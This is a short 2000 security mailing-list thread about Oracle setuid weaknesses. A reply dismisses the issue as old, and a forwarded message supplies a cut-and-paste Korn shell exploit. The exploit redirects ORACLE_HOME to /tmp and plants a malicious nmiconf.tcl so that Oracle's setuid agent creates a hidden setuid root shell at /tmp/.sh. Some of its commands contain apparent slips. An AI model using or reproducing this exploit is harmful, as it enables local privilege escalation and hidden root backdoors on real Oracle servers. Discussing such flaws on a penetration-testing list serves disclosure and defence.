Re: [PEN-TEST] Hmm More Oracle

[Justin Schaefer <JustinS () SCREAMINGMEDIA COM>]

oracle setuid exploits have been around for quite a while, and any decent
oracle dba will have fixed the binaries as one of the first things he does
on a job.

-----Original Message-----
From: Alfred Huger [mailto:ah () SECURITYFOCUS COM]
Sent: Thursday, August 31, 2000 4:12 PM
To: PEN-TEST () SECURITYFOCUS COM
Subject: [PEN-TEST] Hmm More Oracle


I know very little about Oracle and have no access to a set up. This was
just forwarded to me. Any comments?

Alfred Huger
VP of Engineering
SecurityFocus.com

---------- Forwarded message ----------
Date: Thu, 31 Aug 2000 12:39:34 -0800 (PDT)
From: cactusjack () hushmail com
To: ah () securityfocus com
Subject: (fwd)

real quick-like for ya... related.

######### cut and paste the following at the KORN SHELL prompt ############

echo "cp /bin/sh /tmp/.sh ; chmod 4755 /tmp/.sh " > /tmp/cakehole
export $ORACLE_HOME=/tmp/whatever
mkdir -p /tmp/whatever/network/agent/config
cat > /tmp/whatever/network/agent/config/nmiconf.tcl << EOF
#!/usr/local/bin/tclsh*WHATEVERVERSIONYAGOT*
set n [ exec /tmp/cakehole ]
\p\g
EOF